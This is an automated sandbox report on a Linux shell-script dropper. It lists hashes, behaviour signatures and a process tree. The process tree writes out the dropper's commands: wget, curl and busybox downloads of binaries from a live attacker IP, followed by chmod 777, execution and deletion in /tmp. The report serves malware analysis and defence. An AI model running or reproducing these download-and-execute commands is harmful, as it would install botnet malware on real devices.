Analysis
-
max time kernel
109s -
max time network
111s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
24/11/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
-
Size
10KB
-
MD5
f9ec55ea475d5bf2658f26f7f7280c34
-
SHA1
223f1daef72dbab6429966084f88ef60a26414c0
-
SHA256
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d
-
SHA512
1eed0d4a83f257ce571b39a36402dcb8f57e8472144723dddd8f818dcdc12822d4fa9b2db7082665fd82ad30ab790dd8bafa0c7932ba13c04651e782f53953aa
-
SSDEEP
192:EJ/5zEEuzm7PVm+Dgxbw4STnf777PVm+/EEuzufw4STnKjo:y/5v7PVm+DgxMv7PVm+Bo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:712
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:732
-
-
/bin/chmodchmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:736
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:737
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:739
-
-
/bin/chmodchmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:742
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:743
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:747
-
-
/bin/chmodchmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:756
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:758
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:796
-
-
/bin/chmodchmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:799
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:800
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:802
-
-
/bin/chmodchmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:809
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:810
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:827
-
-
/bin/chmodchmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:838
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:839
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:847
-
-
/bin/chmodchmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:850
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:851
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:853
-
-
/bin/chmodchmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:856
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:857
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:859
-
-
/bin/chmodchmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:865
-
-
/bin/chmodchmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:871
-
-
/bin/chmodchmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:877
-
-
/bin/chmodchmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:880
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:881
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:883
-
-
/bin/chmodchmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:886
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:887
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:889
-
-
/bin/chmodchmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:895
-
-
/bin/chmodchmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:901
-
-
/bin/chmodchmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:904
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:905
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:907
-
-
/bin/chmodchmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:910
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:911
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:913
-
-
/bin/chmodchmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:916
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:917
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:919
-
-
/bin/chmodchmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:922
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:923
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:925
-
-
/bin/chmodchmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:928
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:929
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:931
-
-
/bin/chmodchmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:934
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:935
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:937
-
-
/bin/chmodchmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:940
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:941
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:943
-
-
/bin/chmodchmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:946
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:947
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:949
-
-
/bin/chmodchmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:952
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:953
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:955
-
-
/bin/chmodchmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:958
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:959
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:961
-
-
/bin/chmodchmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:964
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:965
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:967
-
-
/bin/chmodchmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:970
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:971
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:973
-
-
/bin/chmodchmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:976
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97